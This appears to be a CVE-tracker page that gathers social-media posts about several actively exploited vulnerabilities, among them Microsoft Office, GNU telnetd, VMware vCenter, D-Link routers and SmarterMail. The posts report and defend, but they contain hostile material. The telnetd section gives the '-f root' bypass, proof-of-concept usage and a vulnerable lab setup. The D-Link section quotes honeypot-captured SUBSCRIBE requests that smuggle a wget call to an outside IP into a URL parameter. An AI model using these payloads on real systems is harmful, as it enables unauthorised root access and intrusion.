24h | 7d | 30d

CVE-2026-21509

Overview

  • Microsoft
  • Microsoft Office 2019
26 Jan 2026
Published
27 Jan 2026
Updated
CVSS v3.1
HIGH (7.8)
EPSS
Pending
KEV

Description

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

Statistics

  • 9 Posts
  • 75 Interactions
Last activity: Last hour

Fediverse

Profile picture
Catalin Cimpanu @campuscodi

Microsoft releases emergency patch for an Office zero-day

msrc.microsoft.com/update-guid

  • 36
  • 34
  • 0
  • 12h ago
Profile picture
Dark Web Informer :verified_paw: @DarkWebInformer

‼️ CVE-2026-21509: Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally

▪️Zero Day: Yes; Actively exploited
▪️CVSS: 7.8
▪️CVE Published: Today, January 26th, 2026

Advisory: msrc.microsoft.com/update-guid

Affected Products:

▪️Microsoft Office 2016 (64-bit edition)
▪️Microsoft Office 2016 (32-bit edition)
▪️Microsoft Office LTSC 2024 for 64-bit editions
▪️Microsoft Office LTSC 2024 for 32-bit editions
▪️Microsoft Office LTSC 2021 for 32-bit editions
▪️Microsoft Office LTSC 2021 for 64-bit editions
▪️Microsoft 365 Apps for Enterprise for 64-bit Systems
▪️Microsoft 365 Apps for Enterprise for 32-bit Systems
▪️Microsoft Office 2019 for 64-bit editions
▪️Microsoft Office 2019 for 32-bit editions

  • 1
  • 1
  • 0
  • 12h ago
Profile picture
TheHackerWire @thehackerwire

🟠 CVE-2026-21509 - High (7.8)

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 1
  • 0
  • 0
  • 12h ago
Profile picture
Günter Born @gborn

Es gibt eine ausgenutzte 0-day Schwachstelle CVE-2026-21509 in faktisch allen Microsoft #Office Versionen. Ab Office 2021 patcht Microsoft serverseitig. Für Office 2016 ist ein Patch da, Office 2019 ist noch offen.

borncity.com/blog/2026/01/27/m

  • 1
  • 0
  • 1
  • 6h ago
Profile picture
Fellows @fellows

Microsoft released CVE-2026-21509 today for an Office Security Feature Bypass Vulnerability. Microsoft has indicated this CVE is being actively exploited and is publicly disclosed.

Update: Patches for Office 2016 and 2019 are apparently now available.

“Office 2021 and later will be automatically protected via a service-side change, but will be required to restart their Office applications for this to take effect.”

msrc.microsoft.com/update-guid

#ThreatIntel

  • 0
  • 0
  • 0
  • 7h ago
Profile picture
Dark Web Informer :verified_paw: @DarkWebInformer

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

Profile picture
Eyal Estrin ☁️ @eyalestrin.bsky.social
Microsoft patches actively exploited Office zero-day vulnerability (CVE-2026-21509) #patchmanagement
  • 0
  • 0
  • 0
  • Last hour
Profile picture
piggo @pigondrugs.bsky.social
~Cisa~ CISA has added five new actively exploited vulnerabilities to its KEV catalog, urging organizations to prioritize remediation. - IOCs: CVE-2018-14634, CVE-2025-52691, CVE-2026-21509 - #CISA #KEV #ThreatIntel #Vulnerability
  • 0
  • 0
  • 0
  • 2h ago

CVE-2026-24061

Overview

  • GNU
  • Inetutils
21 Jan 2026
Published
27 Jan 2026
Updated
CVSS v3.1
CRITICAL (9.8)
EPSS
0.49%
KEV

Description

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Statistics

  • 12 Posts
  • 23 Interactions
Last activity: 3 hours ago

Fediverse

Profile picture
Kevin Beaumont @GossiTheDog

The telnetd vuln has a CVE now - CVE-2026-24061

Proof of concept: github.com/SafeBreach-Labs/CVE

  • 6
  • 11
  • 0
  • 19h ago
Profile picture
Gonçalo Ribeiro @goncalor

Any good, legitimate checker around for CVE-2026-24061 ?

Exploitation is trivial, checking for the vulnerability, not so much.

  • 1
  • 1
  • 0
  • 12h ago
Profile picture
Dark Web Informer :verified_paw: @DarkWebInformer

‼️CVE-2026-24061: Telnet RCE Exploit

GitHub: github.com/SafeBreach-Labs/CVE

This script exploits the CVE-2026-24061 vulnerability in Telnet servers using a malformed USER environment variable.

CVSS: 9.8

Usage:

python telnet_rce.py <host> [-p <port>]

Arguments:

host: Target IP address or hostname (required)
-p, --port: Target port (default: 23)

Example:

python telnet_rce.py 192.168.1.100
python telnet_rce.py example.com -p 23

Writeup: safebreach.com/blog/safebreach

  • 0
  • 2
  • 0
  • 6h ago
Profile picture
Gonçalo Ribeiro @goncalor

Exploitation is completely trivial...

  • 0
  • 1
  • 0
  • 13h ago
Profile picture
The IT Nerd @The_IT_Nerd

New PoC Exploit released for telnetd CVE by SafeBreach Labs

Happy Monday. You may want to keep an eye on CVE-2026-24061 which is a critical telnetd authentication bypass flaw that attackers are actively exploiting to gain root access: New research from SafeBreach Labs deepens the story with the first full root cause analysis and proof-of-concept exploit that explains exactly how this vulnerability works—and why it’s highly dangerous and easy to exploit.  The…

itnerd.blog/2026/01/26/new-poc

  • 0
  • 0
  • 1
  • 17h ago
Profile picture
Gonçalo Ribeiro @goncalor

Here I am installing on Debian in the laboratory... To test CVE-2026-24061.

  • 0
  • 0
  • 0
  • 13h ago
Profile picture
Gonçalo Ribeiro @goncalor 
vagrant init debian/bookworm64
vagrant up
vagrant ssh 

sudo bash
apt update
apt install inetutils-telnetd=2:2.4-2+deb12u1 inetutils-telnet=2:2.4-2+deb12u1
  1. Edit /etc/inetd.conf to enable telnetd
  2. systemctl restart inetutils-inetd
  3. Check telnet is running (ss -tupln | grep :23)

Congratulations, you got yourself a system vulnerable to CVE-2026-24061 !

  • 0
  • 0
  • 0
  • 13h ago
Profile picture
Gonçalo Ribeiro @goncalor

I've successfully tested the PoC in the Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).

github.com/SafeBreach-Labs/CVE

  • 0
  • 0
  • 0
  • 12h ago
Profile picture
geeknik @geeknik

11 years of “trust me, bro” baked into every telnet packet.

Type -f root, hit enter, become god.

The ’90s called—they want their shell back.
securityaffairs.com/187255/sec

  • 0
  • 0
  • 0
  • 3h ago
Profile picture
Dark Web Informer :verified_paw: @DarkWebInformer

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

Profile picture
The Shadowserver Foundation @shadowserver.bsky.social
We have been tweaking the scan the last few days to better weed out non-telnet protocols. Some honeypots may remain. Telnet should not be publicly exposed, but often is especially on legacy iot devices. CVE-2026-24061 info & patch: seclists.org/oss-sec/2026...
  • 0
  • 0
  • 0
  • 20h ago

CVE-2024-37079

Overview

  • VMware vCenter Server
18 Jun 2024
Published
24 Jan 2026
Updated
CVSS v3.1
CRITICAL (9.8)
EPSS
82.70%
KEV

Description

vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

Statistics

  • 6 Posts
  • 1 Interaction
Last activity: 3 hours ago

Fediverse

Profile picture
ekiledjian @edwardk

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has identified a critical VMware vCenter Server vulnerability (CVE-2024-37079) as being actively exploited, mandating federal agencies to patch their systems within three weeks. This heap overflow vulnerability allows for remote code execution with low complexity and no required privileges or user interaction, and Broadcom advises immediate patching as no workarounds exist.
bleepingcomputer.com/news/secu

  • 0
  • 0
  • 0
  • 18h ago
Profile picture
benzogaga33 :verified: @benzogaga33

VMware vCenter : la CVE-2024-37079 est activement exploitée d’après la CISA it-connect.fr/vmware-vcenter-l #ActuCybersécurité #Cybersécurité #Vulnérabilité #VMware

  • 0
  • 0
  • 0
  • 13h ago
Profile picture
Klaus Frank @agowa338

As it is public now* I'm able to talk about it.

Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.

> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.

euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi

support.broadcom.com/web/ecx/s

#infosec #itsec #itsecurity

* technically since Friday.

  • 0
  • 0
  • 0
  • 21h ago

Bluesky

Profile picture
Tech-News @technology-news.bsky.social
CISA added VMware vCenter vulnerability CVE-2024-37079 to its KEV list after confirmed in-the-wild exploitation, urging organizations to apply patches
  • 0
  • 1
  • 0
  • 15h ago
Profile picture
IT-Connect @it-connect.bsky.social
🛑 VMware vCenter : la CVE-2024-37079 est activement exploitée d'après la CISA 👇 Tous les détails par ici - www.it-connect.fr/vmware-vcent... #vmware #infosec #cybersecurite
  • 0
  • 0
  • 0
  • 18h ago
Profile picture
News Analysis @newsanalysis.com
CISA warns of actively exploited critical VMware vCenter Server RCE flaw (CVE-2024-37079). Federal agencies must patch by Feb 13. No workarounds available. #Cybersecurity #News
  • 0
  • 0
  • 0
  • 3h ago

CVE-2026-23864

Overview

  • Meta
  • react-server-dom-webpack
26 Jan 2026
Published
26 Jan 2026
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack. The vulnerabilities are triggered by sending specially crafted HTTP requests to Server Function endpoints, and could lead to server crashes, out-of-memory exceptions or excessive CPU usage; depending on the vulnerable code path being exercised, the application configuration and application code. Strongly consider upgrading to the latest package versions to reduce risk and prevent availability issues in applications using React Server Components.

Statistics

  • 4 Posts
  • 17 Interactions
Last activity: 8 hours ago

Fediverse

Profile picture
Joachim Viide @jviide

New React.js patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly 🙂

The blog post at react.dev/blog/2025/12/11/deni has been updated with the new info.

  • 0
  • 0
  • 0
  • 10h ago
Profile picture
TheHackerWire @thehackerwire

🟠 CVE-2026-23864 - High (7.5)

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.

The vulnerabilities are triggered by sending specially c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 8h ago

Bluesky

Profile picture
Joachim Viide @jviide.iki.fi
New @react.dev patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly 🙂 The blog post at react.dev/blog/2025/12... has been updated with the new info.
  • 4
  • 12
  • 0
  • 10h ago
Profile picture
feedbot.unronritaro.net @feedbot.unronritaro.net
Summary of CVE-2026-23864 | Vercel News
  • 0
  • 1
  • 0
  • 10h ago

CVE-2019-17621

Overview

  • Pending
30 Dec 2019
Published
21 Oct 2025
Updated
CVSS
Pending
EPSS
93.30%
KEV

Description

The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.

Statistics

  • 2 Posts
  • 3 Interactions
Last activity: 11 hours ago

Fediverse

Profile picture
Niels Heinen @heinen

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

  • 1
  • 2
  • 0
  • 17h ago
Profile picture
hrbrmstr 🇺🇦 🇬🇱 🇨🇦 @hrbrmstr

@heinen we get SUBSCRIBE's in from generic D-Link / TRENDnet gena.cgi Buffer Overflow Attempts all the time

```
${SENSOR_IP}/gena.cgi?service=`echo ; wget http://185.93.89.75/81_DI0EI0A0CDC_CVE-2019-17621 -O /dev/null; echo >`
```

Most of the hits from: 192.159.99.95
Alot from: 185.93.89.75
Tiny amt from: 146.70.117.104

May need to see if @iagox86 thinks if that CVE fits too for this.

  • 0
  • 0
  • 0
  • 11h ago

CVE-2026-20045

Overview

  • Cisco
  • Cisco Unified Communications Manager
21 Jan 2026
Published
22 Jan 2026
Updated
CVSS v3.1
HIGH (8.2)
EPSS
0.68%
KEV

Description

A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM &amp; Presence Service (Unified CM IM&amp;P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance could allow an unauthenticated, remote attacker&nbsp;to execute arbitrary commands on the underlying operating system of an affected device.&nbsp; This vulnerability is due to improper validation of user-supplied input in HTTP requests. An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root.

Statistics

  • 2 Posts
Last activity: 13 hours ago

Bluesky

Profile picture
Best of r/cybersecurity @cybersecurity.page
Cisco has confirmed the exploitation of a new Zero-Day vulnerability, CVE-2026-20045, in their HTTP web services. This flaw allows attackers to crash devices or execute code. CISA has added it to the Known Exploited Vulnerabilities catalog, urging patches by Feb 11.
  • 0
  • 0
  • 0
  • 14h ago
Profile picture
Ethical Hacking Consultores @ehcgroup.bsky.social
Cisco corrige la vulnerabilidad Zero-Day explotada activamente en Unified CM y Webex. La vulnerabilidad, CVE-2026-20045 (CVSS: 8,2), podría permitir que un atacante remoto no autenticado ejecute comandos arbitrarios en el sistema operativo. #ciberseguridad www.linkedin.com/pulse/cisco-...
  • 0
  • 0
  • 0
  • 13h ago

CVE-2026-23760

Overview

  • SmarterTools
  • SmarterMail
22 Jan 2026
Published
27 Jan 2026
Updated
CVSS v4.0
CRITICAL (9.3)
EPSS
3.36%
KEV

Description

SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance. NOTE: SmarterMail system administrator privileges grant the ability to execute operating system commands via built-in management functionality, effectively providing administrative (SYSTEM or root) access on the underlying host.

Statistics

  • 2 Posts
  • 3 Interactions
Last activity: 6 hours ago

Fediverse

Profile picture
Dark Web Informer :verified_paw: @DarkWebInformer

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

Profile picture
The Shadowserver Foundation @shadowserver.bsky.social
We added SmarterTools SmarterMail CVE-2026-23760 RCE to our daily Vulnerable HTTP scans. Around 6000 IPs globally found likely vulnerable based on our version check. We also see exploitation attempts in the wild. CVE-2026-23760 Geo Treemap View: dashboard.shadowserver.org/statistics/c...
  • 1
  • 1
  • 0
  • 16h ago

CVE-2025-14847

Overview

  • MongoDB Inc.
  • MongoDB Server
19 Dec 2025
Published
12 Jan 2026
Updated
CVSS v4.0
HIGH (8.7)
EPSS
51.95%
KEV

Description

Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0.

Statistics

  • 1 Post
  • 4 Interactions
Last activity: 13 hours ago

Fediverse

Profile picture
Marvin @inmarvinwetrust

🚨È online un nuovo video su MongoBleed🚨
(CVE-2025-14847), una vulnerabilità recente che sta già venendo sfruttata attivamente.

Non si tratta di una classica esecuzione di codice remoto, ma il rischio è tutt’altro che teorico.

Nel video spiego perché questa vulnerabilità merita attenzione, cosa può succedere in scenari reali e perché ignorarla è un errore.

youtu.be/8DEcMrY8kpA

#sicurezza #mongodb
@sicurezza

  • 1
  • 3
  • 0
  • 13h ago

CVE-2025-53086

Overview

  • Pending
Pending
Published
Pending
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
Last activity: 13 hours ago

Bluesky

Profile picture
ferramentaslinux.bsky.social @ferramentaslinux.bsky.social
Critical HarfBuzz Vulnerability Analysis - SUSE-2026-0287-1 The recent patch for HarfBuzz (CVE-2025-53086) addresses a classic yet dangerous heap corruption bug. Read more: 👉 tinyurl.com/48jsydbr #OpenSUSE #Security
  • 0
  • 0
  • 0
  • 13h ago

CVE-2026-24486

Overview

  • Kludex
  • python-multipart
27 Jan 2026
Published
27 Jan 2026
Updated
CVSS v3.1
HIGH (8.6)
EPSS
Pending
KEV

Description

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workaround, avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.

Statistics

  • 2 Posts
Last activity: 5 hours ago

Fediverse

Profile picture
TheHackerWire @thehackerwire

🟠 CVE-2026-24486 - High (8.6)

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 1
  • 5h ago
Showing 1 to 10 of 57 CVEs